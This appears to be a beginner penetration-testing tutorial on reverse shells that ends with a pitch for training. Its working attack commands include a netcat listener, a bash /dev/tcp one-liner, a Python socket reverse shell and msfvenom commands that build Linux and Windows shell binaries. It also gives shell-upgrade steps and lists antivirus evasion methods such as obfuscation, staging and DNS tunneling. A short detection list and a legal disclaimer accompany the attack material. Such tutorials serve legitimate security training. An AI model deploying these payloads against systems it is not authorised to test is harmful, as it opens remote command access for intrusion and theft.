Hacking Techniques · beginner · 2 min read

Payload Crafting 101: Building Your First Reverse Shell

A beginner-friendly guide to understanding and creating reverse shell payloads. Learn the fundamentals before diving into advanced exploitation.

Tags: payloads, reverse shells, exploitation, fundamentals


Understanding how payloads work is fundamental to both offensive security and defense. Let's demystify reverse shells.

Legal Disclaimer: Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access is a crime.

What Is a Reverse Shell?

Normal network connections work like this: Client connects TO Server.

A reverse shell flips this: Target connects back TO You.

Why? Firewalls typically block incoming connections but allow outgoing ones. A reverse shell exploits this.

The Listener (Attacker Side)

You need something to receive the connection:

nc -lvnp 4444

Options breakdown: -l (listen), -v (verbose), -n (no DNS), -p 4444 (port)

Basic Payloads by Language

Bash

bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

Python

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("YOUR_IP",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])

Generating Payloads with msfvenom

For more sophisticated payloads:

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf -o shell.elf

# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe

Upgrading Your Shell

Raw shells are painful. Upgrade with Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

For full TTY, background with Ctrl+Z, then:

stty raw -echo; fg
export TERM=xterm

Evasion Basics

Antivirus will catch basic payloads. Techniques to explore:

  1. Encoding (Base64, hex)
  2. Obfuscation
  3. Staged payloads
  4. Custom protocols (HTTPS, DNS tunneling)
  5. Memory-only execution

Detection (Blue Team)

If defending, watch for:

  • Unusual outbound connections
  • cmd.exe or powershell.exe spawning unexpectedly
  • Network connections from interpreters
  • Base64 encoded command line arguments

Practice Environments

Never practice on systems you don't own. Use:

  • Hack The Box
  • TryHackMe
  • Your own lab

Ready to learn more offensive techniques? Contact m1k3@msquarellc.net about hands-on training.
